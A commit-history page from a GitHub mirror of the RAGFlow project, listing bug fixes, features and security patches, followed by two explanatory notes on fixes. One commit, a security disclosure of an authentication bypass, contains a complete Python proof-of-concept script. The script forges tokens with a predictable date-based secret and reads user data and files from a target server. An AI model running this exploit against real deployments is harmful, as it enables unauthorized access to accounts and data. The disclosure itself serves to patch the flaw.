ragflow

mirror of https://github.com/infiniflow/ragflow.git synced 2025-11-26 15:07:18 +00:00

Author	SHA1	Message	Date
Kevin Hu	96783aa82c	Fix: remove doc error. (#9413 ) ### What problem does this PR solve? Close #9407 ### Type of change - [x] Bug Fix (non-breaking change which fixes an issue)	2025-08-12 15:55:04 +08:00
Stephen Hu	57b87fa9d9	Fix:TypeError: OllamaCV.chat() got an unexpected keyword argument 'stop' (#9363 ) ### What problem does this PR solve? https://github.com/infiniflow/ragflow/issues/9351 Support filter argument before invoking ### Type of change - [x] Bug Fix (non-breaking change which fixes an issue) --------- Co-authored-by: Kevin Hu <kevinhu.sh@gmail.com>	2025-08-12 14:55:27 +08:00
Kevin Hu	153e430b00	Feat: add meta data filter. (#9405 ) ### What problem does this PR solve? #8531 #7417 #6761 #6573 #6477 ### Type of change - [x] New Feature (non-breaking change which adds functionality)	2025-08-12 14:12:56 +08:00
Yongteng Lei	83771e500c	Refa: migrate chat models to LiteLLM (#9394 ) ### What problem does this PR solve? All models pass the mock response tests, which means that if a model can return the correct response, everything should work as expected. However, not all models have been fully tested in a real environment, the real API_KEY. I suggest actively monitoring the refactored models over the coming period to ensure they work correctly and fixing them step by step, or waiting to merge until most have been tested in practical environment. ### Type of change - [x] Refactoring	2025-08-12 10:59:20 +08:00
Kevin Hu	90eb5fd31b	Fix: canvas sharing bug. (#9339 ) ### What problem does this PR solve? ### Type of change - [x] Bug Fix (non-breaking change which fixes an issue)	2025-08-08 18:31:51 +08:00
Kevin Hu	a02ca16260	Fix: add prologue to api. (#9322 ) ### What problem does this PR solve? ### Type of change - [x] Bug Fix (non-breaking change which fixes an issue)	2025-08-08 17:05:55 +08:00
so95	392f5f4ce9	fix model type (#9250 ) ### What problem does this PR solve? ERROR type model - [x] Bug Fix (non-breaking change which fixes an issue)	2025-08-08 13:43:53 +08:00
Yongteng Lei	1bd64dafcb	Fix: update broken agent completion due to v0.20.0 changes (#9309 ) ### What problem does this PR solve? Update broken agent completion due to v0.20.0 changes. #9199 ### Type of change - [x] Bug Fix (non-breaking change which fixes an issue)	2025-08-08 10:00:16 +08:00
Kevin Hu	5749aa30b0	Fix: model type error. (#9308 ) ### What problem does this PR solve? #9240 ### Type of change - [x] Bug Fix (non-breaking change which fixes an issue)	2025-08-07 16:14:47 +08:00
Yongteng Lei	465f7e036a	Feat: advanced list dialogs (#9256 ) ### What problem does this PR solve? Advanced list dialogs ### Type of change - [x] New Feature (non-breaking change which adds functionality)	2025-08-06 10:33:52 +08:00
Yongteng Lei	e6bad45c6d	Fix: update broken agent OpenAI-Compatible completion due to v0.20.0 changes (#9241 ) ### What problem does this PR solve? Update broken agent OpenAI-Compatible completion due to v0.20.0. #9199 Usage example: Referring the input is important, otherwise, will result in empty output. <img width="1273" height="711" alt="Image" src="https://github.com/user-attachments/assets/30740be8-f4d6-400d-9fda-d2616f89063f" /> <img width="622" height="247" alt="Image" src="https://github.com/user-attachments/assets/0a2ca57a-9600-4cec-9362-0cafd0ab3aee" /> ### Type of change - [x] Bug Fix (non-breaking change which fixes an issue)	2025-08-05 17:47:25 +08:00
Kevin Hu	6ec3f18e22	Fix: self-deployed LLM error, (#9217 ) ### What problem does this PR solve? Close #9197 Close #9145 ### Type of change - [x] Refactoring - [x] Bug fixing.	2025-08-05 09:49:47 +08:00
Yongteng Lei	52a349349d	Fix: migrate deprecated Langfuse API from v2 to v3 (#9204 ) ### What problem does this PR solve? Fix: ```bash 'Langfuse' object has no attribute 'trace' ``` ### Type of change - [x] Bug Fix (non-breaking change which fixes an issue)	2025-08-04 14:45:43 +08:00
Kevin Hu	a16cd4f110	Refa: add result to callback for agent tool use. (#9137 ) ### What problem does this PR solve? ### Type of change - [x] Refactoring	2025-08-01 21:49:39 +08:00
Yongteng Lei	cdac51f145	Fix: Redis stream lag can be nil (#9139 ) ### What problem does this PR solve? ```bash Traceback (most recent call last): File "/home/infiniflow/workspace/ragflow/api/db/services/document_service.py", line 635, in update_progress info["progress_msg"] = "%d tasks are ahead in the queue..."%get_queue_length(priority) File "/home/infiniflow/workspace/ragflow/api/db/services/document_service.py", line 686, in get_queue_length return int(group_info.get("lag", 0)) TypeError: int() argument must be a string, a bytes-like object or a real number, not 'NoneType' ``` This issue occurs very rarely. When a `stream` is first created, the `lag` value may be nil, which triggers the error above. Once any message is synced, the `lag` becomes `0`. ```bash > XINFO GROUPS rag_flow_svr_queue 1) 1) "name" 2) "rag_flow_svr_task_broker" 3) "consumers" 4) (integer) 0 5) "pending" 6) (integer) 0 7) "last-delivered-id" 8) "1753952489937-0" 9) "entries-read" 10) (nil) 11) "lag" 12) (nil) ``` ### Type of change - [x] Bug Fix (non-breaking change which fixes an issue)	2025-08-01 09:39:41 +08:00
Liu An	e9c5c7bc7c	Refa: Update LLMService type hints (#9131 ) ### What problem does this PR solve? - Add Generator return type annotation for tts method - Import typing.Generator for type hints ### Type of change - [x] Refactoring	2025-07-31 12:13:49 +08:00
Kevin Hu	d9fe279dde	Feat: Redesign and refactor agent module (#9113 ) ### What problem does this PR solve? #9082 #6365 <u> WARNING: it's not compatible with the older version of `Agent` module, which means that `Agent` from older versions can not work anymore.</u> ### Type of change - [x] New Feature (non-breaking change which adds functionality)	2025-07-30 19:41:09 +08:00
Stephen Hu	5e7aaf2c41	Fix:When deleting a knowledge base that is currently performing a parsing task, the parsing queue will not be deleted! (#9018 ) ### What problem does this PR solve? https://github.com/infiniflow/ragflow/issues/8995 ### Type of change - [x] Bug Fix (non-breaking change which fixes an issue) --------- Co-authored-by: Kevin Hu <kevinhu.sh@gmail.com>	2025-07-28 17:32:12 +08:00
Stephen Hu	0fccd1fef3	Fix:in the knowledge base operation file will result in an error (#8962 ) ### What problem does this PR solve? https://github.com/infiniflow/ragflow/issues/8941 ### Type of change - [x] Bug Fix (non-breaking change which fixes an issue)	2025-07-25 19:26:31 +08:00
Yongteng Lei	5cc570f5e0	Refa: suppress DB migration error logs (#9043 ) ### What problem does this PR solve? Suppress DB migration error logs. ### Type of change - [x] Refactoring	2025-07-25 12:38:07 +08:00
Kevin Hu	fbd115773b	Perf: set timeout of some steps in KG. (#8873 ) ### What problem does this PR solve? ### Type of change - [x] Performance Improvement	2025-07-16 18:06:03 +08:00
Kevin Hu	f2909ea0c4	Perf: retryable mysql connection. (#8858 ) ### What problem does this PR solve? ### Type of change - [x] Performance Improvement	2025-07-15 19:05:48 +08:00
Kevin Hu	aa4a725529	Perf: use redis to check if canceled. (#8853 ) ### What problem does this PR solve? ### Type of change - [x] Performance Improvement	2025-07-15 17:19:27 +08:00
Can Wang	779932dcb0	Fix: graphrag, raptor can be null for api created kb issue (#8743 ) ### What problem does this PR solve? When a knowledgebase/dataset is created by API, graphrag and raptor can be null, which triggers a NoneType error when this code is reached and prevents the chunking task from finishing. ![image](https://github.com/user-attachments/assets/998a63e9-611b-4301-8808-24839a05be8a) The proposed solution results in None and passes the condition check without error. ![image](https://github.com/user-attachments/assets/184374fb-e06a-46e6-b8ac-d66a3fd93b59) ### Type of change - ✅ Bug Fix (non-breaking change which fixes an issue)	2025-07-09 17:12:42 +08:00
Yongteng Lei	c1f6e6f00e	Feat: add advanced document filter (#8723 ) ### What problem does this PR solve? Add advanced document filter ### Type of change - [x] New Feature (non-breaking change which adds functionality)	2025-07-09 09:33:11 +08:00
Yongteng Lei	4d7bfd2ba3	Fix: typo process_duration (#8696 ) ### What problem does this PR solve? Fix typo process_duration. ### Type of change - [x] Documentation Update - [x] Refactoring	2025-07-07 14:11:47 +08:00
Fee He	ae3683c346	fix task_service.py (#8687 ) Fix the case where pages variable might be None ### What problem does this PR solve? ### Type of change - [x] Bug Fix (non-breaking change which fixes an issue)	2025-07-07 09:48:51 +08:00
Can Wang	83c8af1b59	Fix: page_size can be None error (#8603 ) ### What problem does this PR solve? Issue #8602: `parser_config.task_page_size` can default to `None` when a dataset is created by API. The `task_executor.py` code did not handle this, so `page_size` could sometimes be `None`, which causes an error at line 351. ### Type of change - [x] Bug Fix (non-breaking change which fixes an issue)	2025-07-02 18:38:48 +08:00
Stephen Hu	938d8dd878	Fix: user_default_llm configuration doesn't work for OpenAI API compatible LLM factory (#8502 ) ### What problem does this PR solve? https://github.com/infiniflow/ragflow/issues/8467 When an LLM is added, the llm_name looks like "llm1___OpenAI-API" `f09ca8e795/api/apps/llm_app.py (L173)`, so we should not use llm1 to query. ### Type of change - [x] Bug Fix (non-breaking change which fixes an issue)	2025-06-27 09:41:12 +08:00
Yongteng Lei	d768130204	Fix: chunk number error after re-parsing (#8513 ) ### What problem does this PR solve? Fix chunk number error after re-parsing. #8503. ### Type of change - [x] Bug Fix (non-breaking change which fixes an issue)	2025-06-26 17:46:53 +08:00
Stephen Hu	8d9d2cc0a9	Fix: some cases Task return but not set progress (#8469 ) ### What problem does this PR solve? https://github.com/infiniflow/ragflow/issues/8466 I went through the code. Current logic: when do_handle_task raises an exception, handle_task sets the progress, but in some cases do_handle_task just returns internally without setting the right progress. In those cases the redis stream will have been acked but the task is still running. ### Type of change - [x] Bug Fix (non-breaking change which fixes an issue) --------- Co-authored-by: Kevin Hu <kevinhu.sh@gmail.com>	2025-06-25 09:58:55 +08:00
Yongteng Lei	af6850c8d8	Feat: add MCP dashboard operations (#8460 ) ### What problem does this PR solve? Add MCP server dashboard operations. ### Type of change - [x] New Feature (non-breaking change which adds functionality)	2025-06-25 09:26:04 +08:00
Song Fuchang	fd7ac17605	Feat: Scratch MCP tool calling support. (#8263 ) ### What problem does this PR solve? This is a cherry-pick from #7781 as requested. ### Type of change - [x] New Feature (non-breaking change which adds functionality) Co-authored-by: Kevin Hu <kevinhu.sh@gmail.com>	2025-06-23 17:45:35 +08:00
Yongteng Lei	1b022116d5	Feat: wrap search app (#8320 ) ### What problem does this PR solve? Wrap search app ### Type of change - [x] New Feature (non-breaking change which adds functionality)	2025-06-18 16:45:42 +08:00
Jin Hai	4a2ff633e0	Fix typo in code (#8327 ) ### What problem does this PR solve? Fix typo in code ### Type of change - [x] Refactoring --------- Signed-off-by: Jin Hai <haijin.chn@gmail.com>	2025-06-18 09:41:09 +08:00
Liu An	0a13d79b94	Refa: Implement centralized file name length limit using FILE_NAME_LEN_LIMIT constant (#8318 ) ### What problem does this PR solve? - Replace hardcoded 255-byte file name length checks with FILE_NAME_LEN_LIMIT constant - Update error messages to show the actual limit value - #8290 ### Type of change - [x] Refactoring Co-authored-by: Kevin Hu <kevinhu.sh@gmail.com>	2025-06-17 18:01:30 +08:00
Yongteng Lei	0fa1a1469e	Fix: avoid mixing different embedding models in document parsing (#8260 ) ### What problem does this PR solve? Fix mixing different embedding models in document parsing. ### Type of change - [x] Bug Fix (non-breaking change which fixes an issue) --------- Co-authored-by: Kevin Hu <kevinhu.sh@gmail.com>	2025-06-16 13:40:12 +08:00
Kevin Hu	f7074037ef	Feat: Let number of task ahead be visible. (#8259 ) ### What problem does this PR solve? ![image](https://github.com/user-attachments/assets/d4ef0526-343a-426f-a85a-b05eb8b559a1) ### Type of change - [x] New Feature (non-breaking change which adds functionality)	2025-06-13 17:32:40 +08:00
Yongteng Lei	b2eed8fed1	Fix: incorrect progress updating (#8253 ) ### What problem does this PR solve? Progress is only updated if it's valid and not regressive. ### Type of change - [x] Bug Fix (non-breaking change which fixes an issue)	2025-06-13 17:24:14 +08:00
Stephen Hu	1ab0f52832	Fix: The OpenAI-Compatible Agent API returns an incorrect message (#8177 ) ### What problem does this PR solve? https://github.com/infiniflow/ragflow/issues/8175 ### Type of change - [x] Bug Fix (non-breaking change which fixes an issue)	2025-06-12 19:17:15 +08:00
Stephen Hu	6953ae89c4	Fix: when stream=false, new message without sessionid does no (#8078 ) ### What problem does this PR solve? https://github.com/infiniflow/ragflow/issues/8070 ### Type of change - [x] Bug Fix (non-breaking change which fixes an issue)	2025-06-05 15:14:15 +08:00
Kevin Hu	91804f28f1	Fix: issue for tavily only in a assistant. (#8076 ) ### What problem does this PR solve? ### Type of change - [x] Bug Fix (non-breaking change which fixes an issue)	2025-06-05 13:00:43 +08:00
Gecko Security	de89b84661	Fix: Authentication Bypass via predictable JWT secret and empty token validation (#7998 ) ### Description There's a critical authentication bypass vulnerability that allows remote attackers to gain unauthorized access to user accounts without any credentials. The vulnerability stems from two security flaws: (1) the application uses a predictable `SECRET_KEY` that defaults to the current date, and (2) the authentication mechanism fails to properly validate empty access tokens left by logged-out users. When combined, these flaws allow attackers to forge valid JWT tokens and authenticate as any user who has previously logged out of the system. The authentication flow relies on JWT tokens signed with a `SECRET_KEY` that, in default configurations, is set to `str(date.today())` (e.g., "2025-05-30"). When users log out, their `access_token` field in the database is set to an empty string but their account records remain active. An attacker can exploit this by generating a JWT token that represents an empty access_token using the predictable daily secret, effectively bypassing all authentication controls. ### Source - Sink Analysis Source (User Input): HTTP Authorization header containing attacker-controlled JWT token Flow Path: 1. Entry Point: `load_user()` function in `api/apps/__init__.py` (Line 142) 2. Token Processing: JWT token extracted from Authorization header 3. Secret Key Usage: Token decoded using predictable SECRET_KEY from `api/settings.py` (Line 123) 4. Database Query: `UserService.query()` called with decoded empty access_token 5. 
Sink: Authentication succeeds, returning first user with empty access_token ### Proof of Concept ```python import requests from datetime import date from itsdangerous.url_safe import URLSafeTimedSerializer import sys def exploit_ragflow(target): # Generate token with predictable key daily_key = str(date.today()) serializer = URLSafeTimedSerializer(secret_key=daily_key) malicious_token = serializer.dumps("") print(f"Target: {target}") print(f"Secret key: {daily_key}") print(f"Generated token: {malicious_token}\n") # Test endpoints endpoints = [ ("/v1/user/info", "User profile"), ("/v1/file/list?parent_id=&keywords=&page_size=10&page=1", "File listing") ] auth_headers = {"Authorization": malicious_token} for path, description in endpoints: print(f"Testing {description}...") response = requests.get(f"{target}{path}", headers=auth_headers) if response.status_code == 200: data = response.json() if data.get("code") == 0: print(f"SUCCESS {description} accessible") if "user" in path: user_data = data.get("data", {}) print(f" Email: {user_data.get('email')}") print(f" User ID: {user_data.get('id')}") elif "file" in path: files = data.get("data", {}).get("files", []) print(f" Files found: {len(files)}") else: print(f"Access denied") else: print(f"HTTP {response.status_code}") print() if __name__ == "__main__": target_url = sys.argv[1] if len(sys.argv) > 1 else "http://localhost" exploit_ragflow(target_url) ``` Exploitation Steps: 1. Deploy RAGFlow with default configuration 2. Create a user and make at least one user log out (creating empty access_token in database) 3. Run the PoC script against the target 4. Observe successful authentication and data access without any credentials Version: 0.19.0 @KevinHuSh @asiroliu @cike8899 Co-authored-by: nkoorty <amalyshau2002@gmail.com>	2025-06-05 12:10:24 +08:00
天海蒼灆	9938a4cbb6	Feat: Allow update conversation parameters and persist to database in completion (#8039 ) ### What problem does this PR solve? This PR updates the completion function to allow parameter updates when a session_id exists. It also ensures changes are saved back to the database via API4ConversationService. ### Type of change - [x] New Feature (non-breaking change which adds functionality)	2025-06-04 14:39:04 +08:00
Jin Hai	31f4d44c73	Update upload filename length limit from 128 to 256, which is aligned with os (#7971 ) ### What problem does this PR solve? Change filename length limit from 128 to 256 ### Type of change - [x] Bug Fix (non-breaking change which fixes an issue) Signed-off-by: Jin Hai <haijin.chn@gmail.com>	2025-05-30 14:25:59 +08:00
Qidi Cao	f0879563d0	fix: resolve residual image files issue after document deletion (#7964 ) ### What problem does this PR solve? When deleting knowledge base documents in RAGFlow, the current process only removes the block texts in Elasticsearch and the original files in MinIO, but it leaves behind many binary images and thumbnails generated during chunking. This pull request improves the deletion process by querying the block information in Elasticsearch to ensure a more thorough and complete cleanup. ### Type of change - [x] Bug Fix (non-breaking change which fixes an issue)	2025-05-30 12:56:33 +08:00
Stephen Hu	a31ad7f960	Fix: File selection in Retrieval testing causes other options to disappear (#7759 ) ### What problem does this PR solve? https://github.com/infiniflow/ragflow/issues/7753 The internal cause is that a change in the selected row keys triggers a test, but I do not know why. ### Type of change - [x] Bug Fix (non-breaking change which fixes an issue)	2025-05-30 09:38:50 +08:00
Yongteng Lei	0c562f0a9f	Refa: change citation mark as [ID:n] (#7923 ) ### What problem does this PR solve? Change citation mark as [ID:n], it's easier for LLMs to follow the instruction :) #7904 ### Type of change - [x] Refactoring	2025-05-29 10:03:51 +08:00
sinopec	243ed4bc35	Feat: Support dynamically adding knowledge bases for retrieval while u… (#7915 ) …sing the SDK chat API ### What problem does this PR solve? When using the SDK for chat, you can include the IDs of additional knowledge bases you want to use in the request. This way, you don’t need to repeatedly create new assistants to support various combinations of knowledge bases. This is especially useful when there are many knowledge bases with different content. If users clearly know which knowledge base contains the information they need and select accordingly, the recall accuracy will be greatly improved. Users only need to add an extra field, a kb_ids array, in the HTTP request. The content of this field can be determined by the client fetching the list of knowledge bases and letting the user select from it. ### Type of change - [x] New Feature (non-breaking change which adds functionality) Co-authored-by: Li Ye <liye@unittec.com>	2025-05-28 19:16:16 +08:00
liu an	ff0e82988f	Fix: patch regex vulnerability in filename handling (#7887 ) ### What problem does this PR solve? [Regular Expression Injection leading to Denial of Service (ReDoS)](https://github.com/infiniflow/ragflow/security/advisories/GHSA-wqq6-x8g9-f7mh) ### Type of change - [x] Bug Fix (non-breaking change which fixes an issue)	2025-05-27 16:35:37 +08:00
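
Note on commit cdac51f145 (Redis stream lag can be nil): the traceback shows `int(group_info.get("lag", 0))` failing. `dict.get` only falls back to its default when the key is absent, and here the `lag` key is present with a nil value. The following is a minimal sketch of one way to guard against that, not the project's actual patch. It assumes `group_info` is a plain dict shaped like the `XINFO GROUPS` reply quoted in the commit; the function name `queue_length` is hypothetical.

```python
def queue_length(group_info: dict) -> int:
    """Return the consumer-group lag, treating a missing or nil value as 0.

    Hypothetical helper: `group_info` is assumed to be a dict built from an
    XINFO GROUPS reply, where "lag" may be None on a freshly created stream.
    """
    lag = group_info.get("lag")  # None if the key is absent OR the value is nil
    return int(lag) if lag is not None else 0


# A freshly created stream: the key exists but the value is nil.
fresh_group = {"name": "rag_flow_svr_task_broker", "entries-read": None, "lag": None}
# A group after messages have been synced.
synced_group = {"name": "rag_flow_svr_task_broker", "entries-read": 12, "lag": 3}

print(queue_length(fresh_group))
print(queue_length(synced_group))
print(queue_length({}))
```

Checking `is not None` explicitly, rather than relying on the default argument of `get`, covers both the absent-key and the nil-value case with one branch.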


415 Commits
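
Note on commit de89b84661 (authentication bypass): the report names two flaws, a `SECRET_KEY` that defaults to `str(date.today())` and a user lookup that accepts an empty `access_token`. The sketch below illustrates the two corresponding mitigations using only the standard library. It is an assumption-laden illustration, not the merged fix: `generate_secret_key` and `find_user_by_token` are hypothetical names, and the in-memory `users` list stands in for the database query described in the report.

```python
import secrets
from typing import Optional


def generate_secret_key(num_bytes: int = 32) -> str:
    """Return an unpredictable hex secret instead of a date-derived one."""
    return secrets.token_hex(num_bytes)


def find_user_by_token(users: list, access_token: Optional[str]) -> Optional[dict]:
    """Look up a user by access token, rejecting empty tokens outright.

    Hypothetical stand-in for a database query: logged-out users are assumed
    to carry an empty `access_token`, so an empty input must never match.
    """
    if not access_token or not access_token.strip():
        return None
    for user in users:
        stored = user.get("access_token") or ""
        # Constant-time comparison on bytes avoids leaking match position.
        if stored and secrets.compare_digest(stored.encode("utf-8"),
                                             access_token.encode("utf-8")):
            return user
    return None


users = [
    {"id": "u1", "access_token": ""},        # logged out
    {"id": "u2", "access_token": "abc123"},  # logged in
]

print(len(generate_secret_key()))
print(find_user_by_token(users, ""))
print(find_user_by_token(users, "abc123"))
```

A generated key has to be persisted and reused across restarts, otherwise every restart invalidates existing sessions; where the key is stored is a deployment decision outside this sketch.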